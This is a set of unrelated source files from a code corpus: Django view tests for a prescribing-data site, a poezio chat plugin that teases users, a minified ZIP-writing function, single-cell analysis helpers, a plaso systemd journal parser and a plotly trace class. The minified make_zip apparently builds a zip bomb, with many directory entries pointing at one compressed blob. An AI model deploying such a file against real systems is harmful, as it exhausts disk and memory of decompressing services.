mail.outbox[0].body, re.DOTALL).groups()[0]
response = self.client.get(confirm_url, follow=True)
self.assertContains(
response, "subscribed to monthly alerts about "
"<em>prescribing in 1/ST Andrews")
self.assertTrue(response.context['user'].is_active)
class TestFrontendViews(TransactionTestCase):
fixtures = ['chemicals', 'sections', 'ccgs',
'practices', 'prescriptions', 'measures', 'importlog']
def test_call_view_homepage(self):
response = self.client.get('')
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'index.html')
def test_javascript_inclusion(self):
with self.settings(DEBUG=False):
response = self.client.get('')
doc = pq(response.content)
mainjs = doc('script')[-2].attrib['src']
self.assertIn('openprescribing.min.js', mainjs)
with self.settings(DEBUG=True, INTERNAL_IPS=('127.0.0.1',)):
response = self.client.get('')
doc = pq(response.content)
mainjs = doc('script')[-2].attrib['src']
self.assertIn('openprescribing.js', mainjs)
def test_call_view_analyse(self):
response = self.client.get('/analyse/')
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'analyse.html')
self.assertNotContains(response, "Preview alert email")
def test_call_view_bnf_all(self):
response = self.client.get('/bnf/')
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'all_bnf.html')
self.assertContains(response, '<h1>All BNF sections</h1>')
doc = pq(response.content)
sections = doc('#all-results li')
self.assertEqual(len(sections), 5)
first_section = doc('#all-results li:first')
self.assertEqual(first_section.text(), '2: Cardiovascular System')
def test_call_view_bnf_chapter(self):
response = self.client.get('/bnf/02/')
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'bnf_section.html')
doc = pq(response.content)
title = doc('h1')
self.assertEqual(title.text(), '2: Cardiovascular System')
subsections = doc('a.subsection')
self.assertEqual(len(subsections), 2)
def test_call_view_bnf_section(self):
response = self.client.get('/bnf/0202/')
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'bnf_section.html')
doc = pq(response.content)
title = doc('h1')
self.assertEqual(title.text(), '2.2: Diuretics')
lead = doc('.lead')
self.assertEqual(
lead.text(), 'Part of chapter 2 Cardiovascular System')
subsections = doc('a.subsection')
self.assertEqual(len(subsections), 1)
def test_call_view_bnf_para(self):
response = self.client.get('/bnf/020201/')
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'bnf_section.html')
doc = pq(response.content)
title = doc('h1')
self.assertEqual(
title.text(), '2.2.1: Thiazides And Related Diuretics')
lead = doc('.lead')
self.assertEqual(
lead.text(),
'Part of chapter 2 Cardiovascular System , section 2.2 Diuretics')
subsections = doc('a.subsection')
self.assertEqual(len(subsections), 0)
def test_call_view_chemical_all(self):
response = self.client.get('/chemical/')
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'all_chemicals.html')
self.assertContains(response, '<h1>All chemicals</h1>')
doc = pq(response.content)
title = doc('h1')
self.assertEqual(title.text(), 'All chemicals')
sections = doc('#all-results li')
self.assertEqual(len(sections), 4)
first_section = doc('#all-results li:first')
self.assertEqual(first_section.text(),
'Bendroflumethiazide (0202010B0)')
def test_call_view_chemical_section(self):
response = self.client.get('/chemical/0202010D0/')
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'chemical.html')
doc = pq(response.content)
title = doc('h1')
self.assertEqual(title.text(), 'Chlorothiazide (0202010D0)')
lead = doc('.lead')
self.assertEqual(
lead.text(),
('Part of chapter 2 Cardiovascular System , section 2.2 '
'Diuretics , paragraph 2.2.1 Thiazides And Related Diuretics')
)
def test_call_view_ccg_all(self):
response = self.client.get('/ccg/')
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'all_ccgs.html')
doc = pq(response.content)
title = doc('h1')
self.assertEqual(title.text(), 'All CCGs')
ccgs = doc('a.ccg')
self.assertEqual(len(ccgs), 2)
def test_call_view_ccg_section(self):
response = self.client.get('/ccg/03V/')
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'measures_for_one_ccg.html')
doc = pq(response.content)
title = doc('h1')
self.assertEqual(title.text(), 'CCG: NHS Corby')
practices = doc('#practices li')
self.assertEqual(len(practices), 1)
def test_call_single_measure_for_ccg(self):
response = self.client.get('/measure/cerazette/ccg/03V/')
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'measure_for_one_ccg.html')
def test_call_view_practice_all(self):
response = self.client.get('/practice/')
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'all_practices.html')
doc = pq(response.content)
title = doc('h1')
self.assertEqual(title.text(), 'Find a practice')
practices = doc('#all-results a.practice')
self.assertEqual(len(practices), 0)
def test_call_view_practice_section(self):
response = self.client.get('/practice/P87629/')
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'measures_for_one_practice.html')
doc = pq(response.content)
title = doc('h1')
self.assertEqual(title.text(), '1/ST ANDREWS MEDICAL PRACTICE')
lead = doc('#intro p:first')
self.assertEqual(
lead.text(),
('Address: ST.ANDREWS MEDICAL CENTRE, 30 RUSSELL STREET '
'ECCLES, MANCHESTER, M30 0NU'))
lead = doc('.lead:last')
def test_call_single_measure_for_practice(self):
response = self.client.get('/measure/cerazette/practice/P87629/')
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'measure_for_one_practice.html')
def test_call_view_measure_ccg(self):
response = self.client.get('/ccg/03V/')
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'measures_for_one_ccg.html')
doc = pq(response.content)
title = doc('h1')
self.assertEqual(title.text(), 'CCG: NHS Corby')
practices = doc('#practices li')
self.assertEqual(len(practices), 1)
def test_call_view_measure_practice(self):
response = self.client.get('/practice/P87629/')
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'measures_for_one_practice.html')
doc = pq(response.content)
title = doc('h1')
self.assertEqual(title.text(), '1/ST ANDREWS MEDICAL PRACTICE')
def test_call_view_measure_practices_in_ccg(self):
response = self.client.get('/ccg/03V/cerazette/')
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'measure_for_practices_in_ccg.html')
doc = pq(response.content)
title = doc('h1')
t = ('Cerazette vs. Desogestrel by GP practices '
'in NHS Corby')
self.assertEqual(title.text(), t)
def test_call_view_practice_redirect(self):
response = self.client.get('/practice/P87629/measures/')
self.assertEqual(response.status_code, 301)
def test_call_view_ccg_redirect(self):
response = self.client.get('/ccg/03V/measures/')
self.assertEqual(response.status_code, 301)
def test_all_measures(self):
response = self.client.get('/measure/')
self.assertContains(response, 'Cerazette')
def test_all_measures_with_tag_filter(self):
response = self.client.get('/measure/?tags=frob')
self.assertNotContains(response, 'Cerazette')
self.assertContains(response, 'This list is filtered')
def test_gdoc_inclusion(self):
for doc_id in settings.GDOC_DOCS.keys():
response = self.client.get("/docs/%s/" % doc_id)
self.assertEqual(response.status_code, 200)
def test_tariff(self):
response = self.client.get('/tariff/ABCD/')
self.assertContains(response, 'Tariff')
self.assertContains(response, 'bnfCodes = "ABCD"')
class TestPPUViews(TransactionTestCase):
fixtures = ['ccgs', 'importlog', 'dmdproducts',
'practices', 'prescriptions', 'presentations']
def test_practice_price_per_unit(self):
response = self.client.get('/practice/P87629/price_per_unit/')
self.assertEqual(response.status_code, 200)
self.assertEqual(response.context['entity'].code, 'P87629')
def test_ccg_price_per_unit(self):
response = self.client.get('/ccg/03V/price_per_unit/')
self.assertEqual(response.status_code, 200)
self.assertEqual(response.context['entity'].code, '03V')
self.assertEqual(response.context['date'].strftime('%Y-%m-%d'),
'2014-11-01')
def test_price_per_unit_histogram_with_ccg(self):
response = self.client.get('/ccg/03V/0202010F0AAAAAA/price_per_unit/')
self.assertEqual(response.status_code, 200)
self.assertEqual(response.context['highlight_name'], 'NHS Corby')
self.assertEqual(response.context['date'].strftime('%Y-%m-%d'),
'2014-11-01')
def test_price_per_unit_histogram_with_practice(self):
response = self.client.get(
'/practice/P87629/0202010F0AAAAAA/price_per_unit/')
self.assertEqual(response.status_code, 200)
self.assertEqual(response.context['highlight_name'],
'1/ST Andrews Medical Practice')
self.assertEqual(response.context['date'].strftime('%Y-%m-%d'),
'2014-11-01')
bubble_data_url = response.context['bubble_data_url']
parsed_url = urlparse(bubble_data_url)
q = parse_qs(parsed_url.query)
self.assertEqual(q, {
'format': ['json'],
'bnf_code': ['0202010F0AAAAAA'],
'highlight': ['P87629'],
'date': ['2014-11-01'],
})
|
the-stack_106_23800 | """
Repeats the last word of the last message in the conversation, and uses it in
an annoying “C’est toi le” sentence.
Installation
------------
You only have to load the plugin:
.. code-block:: none
/load stoi
.. glossary::
/stoi
**Usage:** ``/stoi``
"""
from poezio.plugin import BasePlugin
from poezio import tabs
import string
from poezio import xhtml
import random
char_we_dont_want = string.punctuation + ' ’„“”…«»'
class Plugin(BasePlugin):
def init(self):
for tab_type in (tabs.MucTab, tabs.PrivateTab, tabs.ConversationTab):
self.api.add_tab_command(
tab_type,
'stoi',
handler=self.stoi,
help="Repeats the last word of the last "
"message in the conversation, and "
"use it in an annoying “C’est toi "
"le” sentence.",
short='C’est toi le stoi.')
def stoi(self, args):
messages = self.api.get_conversation_messages()
if not messages:
# Do nothing if the conversation doesn’t contain any message
return
last_message = messages[-1]
txt = xhtml.clean_text(last_message.txt)
for char in char_we_dont_want:
txt = txt.replace(char, ' ')
if txt.strip():
last_word = txt.split()[-1]
else:
last_word = "vide"
intro = "C'est toi " if random.getrandbits(1) else "Stoi "
if last_word[0] in 'aeiouAEIOUÀàÉéÈè':
msg = intro + ('l’%s' % last_word)
else:
msg = intro + ('le %s' % last_word)
self.api.send_message(msg)
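# A hedged behaviour sketch, added here and not part of the plugin: if the last message
# in the current tab were "tu es vraiment incroyable", running /stoi would send either
# "C'est toi l’incroyable" or "Stoi l’incroyable" (a vowel-initial last word takes the
# elided form), while a consonant-initial last word such as "stoi" would yield "... le stoi".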
|
the-stack_106_23802 | # warning: minified
from struct import pack as F
from functools import reduce
G=lambda m,v:reduce(lambda i,j:i^j,[j*(v>>i&1) for i,j in enumerate(m)])
def make_zip(f,num_files,compressed_size):
A,H,B,I,a,o=(1<<32)-1,num_files,compressed_size,[1<<A for A in range(33)],range(8),[0]*8
for n in a:
for b in a:o[n]=o[n]>>1^3988292384*((1<<n>>b^o[n])&1)
C,D=B*1032-14447,o+I[:24]+[A+1];K=C
while C:
if C&1:I=[G(I,A)for A in D]
D=[G(D,A)for A in D];C>>=1
L=~G(I,2*A+1)&A;J=f.write(F('<QLHLLLLQLH',85966670672,8,0,L,B,K,1,36536642864,1409003712,25695)+b'\x0b'+b'\0'*(B-15)+b'`');M=J
for E in range(H):N=str(E).encode();J+=f.write(F('<QQLLLHQQ',5629585467198288,524288,L,B,K,len(N),0,0)+N)
f.write(F('<QHHLLH',101010256,H,H,J-M,M,0))
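# Hedged usage sketch (not part of the original, deliberately minified module): make_zip
# only needs a writable binary file object plus the two size parameters; the exact archive
# layout it emits is governed by the packed constants above.
#
#     if __name__ == '__main__':
#         with open('generated.zip', 'wb') as f:   # hypothetical output path
#             make_zip(f, num_files=10, compressed_size=1 << 16)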
|
the-stack_106_23803 | import numpy as np
import pandas as pd
from typing import List
from anndata import AnnData
import logging
import warnings
logger = logging.getLogger("pegasus")
def search_genes(
data: AnnData,
gene_list: List[str],
rec_key: str = "de_res",
measure: str = "percentage",
) -> pd.DataFrame:
"""Extract and display gene expressions for each cluster from an `anndata` object.
This function helps to see marker expressions in clusters via the interactive python environment.
Parameters
----------
data: ``anndata.AnnData``
Annotated data matrix containing the expression matrix and differential expression results.
gene_list: ``List[str]``
A list of gene symbols.
rec_key: ``str``, optional, default: ``"de_res"``
Keyword of DE analysis result stored in ``data.varm``.
measure : ``str``, optional, default: ``"percentage"``
Can be either ``"percentage"`` or ``"mean_logExpr"``:
* ``percentage`` shows the percentage of cells expressed the genes;
* ``mean_logExpr`` shows the mean log expression.
Returns
-------
``pandas.DataFrame``
A data frame containing marker expressions in each cluster.
Examples
--------
>>> results = pg.search_genes(adata, ['CD3E', 'CD4', 'CD8'])
"""
columns = [x for x in data.varm[rec_key].dtype.names if x.endswith(f":{measure}")]
df = pd.DataFrame(data=data.varm[rec_key][columns], index=data.var_names)
return df.reindex(index=gene_list)
def search_de_genes(
data: AnnData,
gene_list: List[str],
rec_key: str = "de_res",
de_test: str = "fisher",
de_alpha: float = 0.05,
thre: float = 1.5,
) -> pd.DataFrame:
"""Extract and display differential expression analysis results of markers for each cluster.
This function helps to see if markers are up or down regulated in each cluster via the interactive python environment:
* ``++`` indicates up-regulated and fold change >= threshold;
* ``+`` indicates up-regulated but fold change < threshold;
* ``--`` indicates down-regulated and fold change <= 1 / threshold;
* ``-`` indicates down-regulated but fold change > 1 / threshold;
* ``?`` indicates not differentially expressed.
Parameters
----------
data: ``anndata.Anndata``
Annotated data matrix containing the expression matrix and differential expression results.
gene_list: ``List[str]``
A list of gene symbols.
rec_key: ``str``, optional, default: ``"de_res"``
Keyword of DE analysis result stored in ``data.varm``.
de_test : ``str``, optional, default: ``"fisher"``
Differential expression test to look at, could be either ``t``, ``fisher`` or ``mwu``.
de_alpha : ``float``, optional, default: ``0.05``
False discovery rate.
thre : ``float``, optional, default: ``1.5``
Fold change threshold to determine if the marker is a strong DE (``++`` or ``--``) or weak DE (``+`` or ``-``).
Returns
-------
``pandas.DataFrame``
A data frame containing marker differential expression results for each cluster.
Examples
--------
>>> df = pegasus.misc.search_de_genes(adata, ['CD3E', 'CD4', 'CD8'], thre = 2.0)
"""
columns = [
x for x in data.varm[rec_key].dtype.names if x.endswith(f":{de_test}_qval")
]
df_de = pd.DataFrame(data.varm[rec_key][columns], index=data.var_names)
df_de = df_de.reindex(index=gene_list)
columns = [
x
for x in data.varm[rec_key].dtype.names
if (
x.endswith(":percentage_fold_change")
if de_test == "fisher"
else x.endswith(":log2FC")
)
]
df_fc = pd.DataFrame(data.varm[rec_key][columns], index=data.var_names)
df_fc = df_fc.reindex(index=gene_list)
if de_test != "fisher":
df_fc = np.exp(df_fc)
results = np.zeros((len(gene_list), len(columns)), dtype=np.dtype("U4"))
results[:] = "?"
results[np.isnan(df_de)] = "NaN"
results[(df_de <= de_alpha).values & (df_fc > 1.0).values] = "+"
results[(df_de <= de_alpha).values & (df_fc >= thre).values] = "++"
results[(df_de <= de_alpha).values & (df_fc < 1.0).values] = "-"
results[(df_de <= de_alpha).values & (df_fc <= 1.0 / thre).values] = "--"
clusts = [x.rpartition(":")[2] for x in columns]
df = pd.DataFrame(data=results, index=gene_list, columns=clusts)
return df
def show_attributes(
input_file: str,
show_attributes: bool,
show_gene_attributes: bool,
show_values_for_attributes: str,
) -> None:
""" Show data attributes. For command line use.
"""
# data = read_input(input_file, mode="r")
# if show_attributes:
# print(
# "Available sample attributes in input dataset: {0}".format(
# ", ".join(data.obs.columns.values)
# )
# )
# if show_gene_attributes:
# print(
# "Available gene attributes in input dataset: {0}".format(
# ", ".join(data.var.columns.values)
# )
# )
# if not show_values_for_attributes is None:
# for attr in show_values_for_attributes.split(","):
# print(
# "Available values for attribute {0}: {1}.".format(
# attr, ", ".join(np.unique(data.obs[attr]))
# )
# )
def perform_oneway_anova(
data: AnnData,
glist: List[str],
restriction_vec: List[str],
group_str: str,
fdr_alpha: float = 0.05,
res_key: str = None,
) -> pd.DataFrame:
"""Perform one way ANOVA on a subset of cells (restricted by restriction_vec) grouped by group_str and control FDR at fdr_alpha.
Parameters
----------
data : `anndata` object
An `anndata` object containing the expression matrix.
glist : `list[str]`
A list of gene symbols.
restriction_vec : `list[str]`
A vector of restrictions for selecting cells. Each restriction takes the format of attr:value,value,value
group_str : `str`
        How to group selected cells for ANOVA analysis. For pseudotime grouping it has two formats: 1) 'pseudotime:time:n', which divides cells into n groups spanning equal pseudotime intervals; 2) 'pseudotime:size:n', which divides cells into n groups of equal size. Otherwise it takes the form 'attr:name1~value1,value2;name2~value3', grouping cells by the listed values of the observation attribute attr.
fdr_alpha : `float`, optional (default: 0.05)
False discovery rate.
res_key : `str`, optional (default: None)
Store results into data using res_key, the grouping information is stored in obs and the results is stored in uns.
Returns
-------
`pandas.DataFrame`
Results for genes that pass FDR control.
Examples
--------
>>> results = misc.perform_oneway_anova(data, ['CD3E', 'CD4', 'CD8'], [], 'pseudotime:size:10')
"""
from scipy.stats import f_oneway
from statsmodels.stats.multitest import fdrcorrection as fdr
selected = np.ones(data.shape[0], dtype=bool)
for rest_str in restriction_vec:
attr, value_str = rest_str.split(":")
values = value_str.split(",")
selected = selected & np.isin(data.obs[attr], values)
gene_list = np.array(glist)
gene_list = gene_list[np.isin(gene_list, data.var_names)]
ngene = gene_list.size
newdat = data[selected, :][:, gene_list].copy()
newdat.X = newdat.X.toarray()
group_values = group_str.split(":")
group_names = []
col_names = []
ngr = 0
group_idx = None
if group_values[0] == "pseudotime":
assert len(group_values) == 3
div_by = group_values[1]
ngr = int(group_values[2])
group_idx = np.zeros((ngr, newdat.shape[0]), dtype=bool)
pseudotimes = newdat.obs["pseudotime"].values
min_t = pseudotimes.min()
max_t = pseudotimes.max()
if div_by == "time":
interval = (max_t - min_t) / ngr
left = min_t - 1e-5
for i in range(ngr):
right = min_t + interval * (i + 1)
name = "({:.2f}, {:.2f}]".format(left if left >= 0 else 0.0, right)
group_names.append(name)
group_idx[i] = (pseudotimes > left) & (pseudotimes <= right)
left = right
else:
assert div_by == "size"
ords = np.argsort(pseudotimes)
quotient = ords.size // ngr
            residue = ords.size % ngr
            fr = 0
            for i in range(ngr):
                to = fr + quotient + (i < residue)
name = "[{:.2f}, {:.2f}]".format(
pseudotimes[ords[fr]], pseudotimes[ords[to - 1]]
)
group_names.append(name)
group_idx[i][ords[fr:to]] = True
fr = to
else:
assert len(group_values) == 2
group_attr = group_values[0]
tmp_str = group_values[1]
groups_str = tmp_str.split(";")
ngr = len(groups_str)
group_idx = np.zeros((ngr, newdat.shape[0]), dtype=bool)
for i, gstr in enumerate(groups_str):
name, values = gstr.split("~")
group_names.append(name)
group_idx[i] = np.isin(newdat.obs[group_attr], values.split(","))
for i in range(ngr):
print("Group {} has {} cells.".format(group_names[i], group_idx[i].sum()))
    warnings.filterwarnings("ignore")  # np.warnings was removed in newer NumPy; use the stdlib module directly
stats = np.zeros((ngene, 3 + ngr * 2))
for i in range(ngene):
arr_list = []
for j in range(ngr):
arr = newdat.X[group_idx[j], i]
stats[i, 3 + j * 2] = arr.mean()
stats[i, 3 + j * 2 + 1] = (arr > 0).sum() * 100.0 / arr.size
arr_list.append(arr)
stats[i, 0], stats[i, 1] = f_oneway(*arr_list)
if np.isnan(stats[i, 0]):
stats[i, 0] = 0.0
stats[i, 1] = 1.0
passed, stats[:, 2] = fdr(stats[:, 1])
cols = ["fstat", "pval", "qval"]
for i in range(ngr):
cols.extend([group_names[i] + "_mean", group_names[i] + "_percent"])
raw_results = pd.DataFrame(stats, columns=cols, index=gene_list)
results = raw_results[raw_results["qval"] <= fdr_alpha]
results = results.sort_values("qval")
if res_key is not None:
data.uns[res_key] = raw_results
data.obs[res_key] = "background"
for i in range(ngr):
idx = np.zeros(data.shape[0], dtype=bool)
idx[selected] = group_idx[i]
data.obs.loc[idx, res_key] = group_names[i]
return results
|
the-stack_106_23804 | # -*- coding: utf-8 -*-
"""Parser for Systemd journal files."""
from __future__ import unicode_literals
import lzma
from lz4 import block as lz4_block
from dfdatetime import posix_time as dfdatetime_posix_time
from plaso.containers import events
from plaso.containers import time_events
from plaso.lib import definitions
from plaso.lib import errors
from plaso.lib import specification
from plaso.parsers import dtfabric_parser
from plaso.parsers import manager
class SystemdJournalEventData(events.EventData):
"""Systemd journal event data.
Attributes:
body (str): message body.
hostname (str): hostname.
pid (int): process identifier (PID).
reporter (str): reporter.
"""
DATA_TYPE = 'systemd:journal'
def __init__(self):
"""Initializes event data."""
super(SystemdJournalEventData, self).__init__(data_type=self.DATA_TYPE)
self.body = None
self.hostname = None
self.pid = None
self.reporter = None
class SystemdJournalParser(dtfabric_parser.DtFabricBaseParser):
"""Parses Systemd Journal files."""
NAME = 'systemd_journal'
DESCRIPTION = 'Parser for Systemd Journal files.'
_DEFINITION_FILE = 'systemd_journal.yaml'
_OBJECT_COMPRESSED_FLAG_XZ = 1
_OBJECT_COMPRESSED_FLAG_LZ4 = 2
_OBJECT_TYPE_UNUSED = 0
_OBJECT_TYPE_DATA = 1
_OBJECT_TYPE_FIELD = 2
_OBJECT_TYPE_ENTRY = 3
_OBJECT_TYPE_DATA_HASH_TABLE = 4
_OBJECT_TYPE_FIELD_HASH_TABLE = 5
_OBJECT_TYPE_ENTRY_ARRAY = 6
_OBJECT_TYPE_TAG = 7
_SUPPORTED_FILE_HEADER_SIZES = frozenset([208, 224, 240])
def __init__(self):
"""Initializes a parser object."""
super(SystemdJournalParser, self).__init__()
self._maximum_journal_file_offset = 0
def _ParseDataObject(self, file_object, file_offset):
"""Parses a data object.
Args:
file_object (dfvfs.FileIO): a file-like object.
file_offset (int): offset of the data object relative to the start
of the file-like object.
Returns:
bytes: data.
Raises:
ParseError: if the data object cannot be parsed.
"""
data_object_map = self._GetDataTypeMap('systemd_journal_data_object')
try:
data_object, _ = self._ReadStructureFromFileObject(
file_object, file_offset, data_object_map)
except (ValueError, errors.ParseError) as exception:
raise errors.ParseError((
'Unable to parse data object at offset: 0x{0:08x} with error: '
'{1!s}').format(file_offset, exception))
if data_object.object_type != self._OBJECT_TYPE_DATA:
raise errors.ParseError('Unsupported object type: {0:d}.'.format(
data_object.object_type))
if data_object.object_flags not in (
0, self._OBJECT_COMPRESSED_FLAG_XZ, self._OBJECT_COMPRESSED_FLAG_LZ4):
raise errors.ParseError('Unsupported object flags: 0x{0:02x}.'.format(
data_object.object_flags))
# The data is read separately for performance reasons.
data_size = data_object.data_size - 64
data = file_object.read(data_size)
if data_object.object_flags & self._OBJECT_COMPRESSED_FLAG_XZ:
data = lzma.decompress(data)
elif data_object.object_flags & self._OBJECT_COMPRESSED_FLAG_LZ4:
uncompressed_size_map = self._GetDataTypeMap('uint32le')
try:
uncompressed_size = self._ReadStructureFromByteStream(
data, file_offset + 64, uncompressed_size_map)
except (ValueError, errors.ParseError) as exception:
raise errors.ParseError((
'Unable to parse LZ4 uncompressed size at offset: 0x{0:08x} with '
'error: {1!s}').format(file_offset + 64, exception))
data = lz4_block.decompress(data[8:], uncompressed_size=uncompressed_size)
return data
def _ParseEntryArrayObject(self, file_object, file_offset):
"""Parses an entry array object.
Args:
file_object (dfvfs.FileIO): a file-like object.
file_offset (int): offset of the entry array object relative to the start
of the file-like object.
Returns:
systemd_journal_entry_array_object: entry array object.
Raises:
ParseError: if the entry array object cannot be parsed.
"""
entry_array_object_map = self._GetDataTypeMap(
'systemd_journal_entry_array_object')
try:
entry_array_object, _ = self._ReadStructureFromFileObject(
file_object, file_offset, entry_array_object_map)
except (ValueError, errors.ParseError) as exception:
raise errors.ParseError((
'Unable to parse entry array object at offset: 0x{0:08x} with error: '
'{1!s}').format(file_offset, exception))
if entry_array_object.object_type != self._OBJECT_TYPE_ENTRY_ARRAY:
raise errors.ParseError('Unsupported object type: {0:d}.'.format(
entry_array_object.object_type))
if entry_array_object.object_flags != 0:
raise errors.ParseError('Unsupported object flags: 0x{0:02x}.'.format(
entry_array_object.object_flags))
return entry_array_object
def _ParseEntryObject(self, file_object, file_offset):
"""Parses an entry object.
Args:
file_object (dfvfs.FileIO): a file-like object.
file_offset (int): offset of the entry object relative to the start
of the file-like object.
Returns:
systemd_journal_entry_object: entry object.
Raises:
ParseError: if the entry object cannot be parsed.
"""
entry_object_map = self._GetDataTypeMap('systemd_journal_entry_object')
try:
entry_object, _ = self._ReadStructureFromFileObject(
file_object, file_offset, entry_object_map)
except (ValueError, errors.ParseError) as exception:
raise errors.ParseError((
'Unable to parse entry object at offset: 0x{0:08x} with error: '
'{1!s}').format(file_offset, exception))
if entry_object.object_type != self._OBJECT_TYPE_ENTRY:
raise errors.ParseError('Unsupported object type: {0:d}.'.format(
entry_object.object_type))
if entry_object.object_flags != 0:
raise errors.ParseError('Unsupported object flags: 0x{0:02x}.'.format(
entry_object.object_flags))
return entry_object
def _ParseEntryObjectOffsets(self, file_object, file_offset):
"""Parses entry array objects for the offset of the entry objects.
Args:
file_object (dfvfs.FileIO): a file-like object.
file_offset (int): offset of the first entry array object relative to
the start of the file-like object.
Returns:
list[int]: offsets of the entry objects.
"""
entry_array_object = self._ParseEntryArrayObject(file_object, file_offset)
entry_object_offsets = list(entry_array_object.entry_object_offsets)
while entry_array_object.next_entry_array_offset != 0:
entry_array_object = self._ParseEntryArrayObject(
file_object, entry_array_object.next_entry_array_offset)
entry_object_offsets.extend(entry_array_object.entry_object_offsets)
return entry_object_offsets
def _ParseJournalEntry(self, file_object, file_offset):
"""Parses a journal entry.
This method will generate an event per ENTRY object.
Args:
file_object (dfvfs.FileIO): a file-like object.
file_offset (int): offset of the entry object relative to the start
of the file-like object.
Returns:
dict[str, objects]: entry items per key.
Raises:
ParseError: when an object offset is out of bounds.
"""
entry_object = self._ParseEntryObject(file_object, file_offset)
# The data is read separately for performance reasons.
entry_item_map = self._GetDataTypeMap('systemd_journal_entry_item')
file_offset += 64
data_end_offset = file_offset + entry_object.data_size - 64
fields = {'real_time': entry_object.real_time}
while file_offset < data_end_offset:
try:
entry_item, entry_item_data_size = self._ReadStructureFromFileObject(
file_object, file_offset, entry_item_map)
except (ValueError, errors.ParseError) as exception:
raise errors.ParseError((
'Unable to parse entry item at offset: 0x{0:08x} with error: '
'{1!s}').format(file_offset, exception))
file_offset += entry_item_data_size
if entry_item.object_offset < self._maximum_journal_file_offset:
raise errors.ParseError(
'object offset should be after hash tables ({0:d} < {1:d})'.format(
entry_item.object_offset, self._maximum_journal_file_offset))
event_data = self._ParseDataObject(file_object, entry_item.object_offset)
event_string = event_data.decode('utf-8')
key, value = event_string.split('=', 1)
fields[key] = value
return fields
@classmethod
def GetFormatSpecification(cls):
"""Retrieves the format specification.
Returns:
FormatSpecification: format specification.
"""
format_specification = specification.FormatSpecification(cls.NAME)
format_specification.AddNewSignature(b'LPKSHHRH', offset=0)
return format_specification
def ParseFileObject(self, parser_mediator, file_object):
"""Parses a Systemd journal file-like object.
Args:
parser_mediator (ParserMediator): parser mediator.
file_object (dfvfs.FileIO): a file-like object.
Raises:
UnableToParseFile: when the header cannot be parsed.
"""
file_header_map = self._GetDataTypeMap('systemd_journal_file_header')
try:
file_header, _ = self._ReadStructureFromFileObject(
file_object, 0, file_header_map)
except (ValueError, errors.ParseError) as exception:
raise errors.UnableToParseFile(
'Unable to parse file header with error: {0!s}'.format(
exception))
if file_header.header_size not in self._SUPPORTED_FILE_HEADER_SIZES:
raise errors.UnableToParseFile(
'Unsupported file header size: {0:d}.'.format(
file_header.header_size))
data_hash_table_end_offset = (
file_header.data_hash_table_offset +
file_header.data_hash_table_size)
field_hash_table_end_offset = (
file_header.field_hash_table_offset +
file_header.field_hash_table_size)
self._maximum_journal_file_offset = max(
data_hash_table_end_offset, field_hash_table_end_offset)
entry_object_offsets = self._ParseEntryObjectOffsets(
file_object, file_header.entry_array_offset)
for entry_object_offset in entry_object_offsets:
if entry_object_offset == 0:
continue
try:
fields = self._ParseJournalEntry(file_object, entry_object_offset)
except errors.ParseError as exception:
parser_mediator.ProduceExtractionWarning((
'Unable to parse journal entry at offset: 0x{0:08x} with '
'error: {1!s}').format(entry_object_offset, exception))
return
event_data = SystemdJournalEventData()
event_data.body = fields.get('MESSAGE', None)
event_data.hostname = fields.get('_HOSTNAME', None)
event_data.reporter = fields.get('SYSLOG_IDENTIFIER', None)
if event_data.reporter and event_data.reporter != 'kernel':
event_data.pid = fields.get('_PID', fields.get('SYSLOG_PID', None))
date_time = dfdatetime_posix_time.PosixTimeInMicroseconds(
timestamp=fields['real_time'])
event = time_events.DateTimeValuesEvent(
date_time, definitions.TIME_DESCRIPTION_WRITTEN)
parser_mediator.ProduceEventWithEventData(event, event_data)
manager.ParsersManager.RegisterParser(SystemdJournalParser)
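# Hedged usage note (added here, not part of the module): the RegisterParser call above is
# what makes this parser selectable by plaso's front-ends; limiting a run to it is usually
# done with something like `log2timeline.py --parsers systemd_journal ...` (flag spelling
# assumed from recent plaso releases -- check the installed version).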
|
the-stack_106_23807 | from plotly.basedatatypes import BaseTraceHierarchyType as _BaseTraceHierarchyType
import copy as _copy
class X(_BaseTraceHierarchyType):
# class properties
# --------------------
_parent_path_str = "volume.slices"
_path_str = "volume.slices.x"
_valid_props = {"fill", "locations", "locationssrc", "show"}
# fill
# ----
@property
def fill(self):
"""
Sets the fill ratio of the `slices`. The default fill value of
        the `slices` is 1, meaning that they are entirely shaded. On the
        other hand, applying a `fill` ratio less than one allows the
        creation of openings parallel to the edges.
The 'fill' property is a number and may be specified as:
- An int or float in the interval [0, 1]
Returns
-------
int|float
"""
return self["fill"]
@fill.setter
def fill(self, val):
self["fill"] = val
# locations
# ---------
@property
def locations(self):
"""
Specifies the location(s) of slices on the axis. When not
        specified, slices are created for all points of the x axis
        except the start and end.
The 'locations' property is an array that may be specified as a tuple,
list, numpy array, or pandas Series
Returns
-------
numpy.ndarray
"""
return self["locations"]
@locations.setter
def locations(self, val):
self["locations"] = val
# locationssrc
# ------------
@property
def locationssrc(self):
"""
Sets the source reference on Chart Studio Cloud for
`locations`.
The 'locationssrc' property must be specified as a string or
as a plotly.grid_objs.Column object
Returns
-------
str
"""
return self["locationssrc"]
@locationssrc.setter
def locationssrc(self, val):
self["locationssrc"] = val
# show
# ----
@property
def show(self):
"""
Determines whether or not slice planes about the x dimension
are drawn.
The 'show' property must be specified as a bool
(either True, or False)
Returns
-------
bool
"""
return self["show"]
@show.setter
def show(self, val):
self["show"] = val
# Self properties description
# ---------------------------
@property
def _prop_descriptions(self):
return """\
fill
Sets the fill ratio of the `slices`. The default fill
            value of the `slices` is 1, meaning that they are
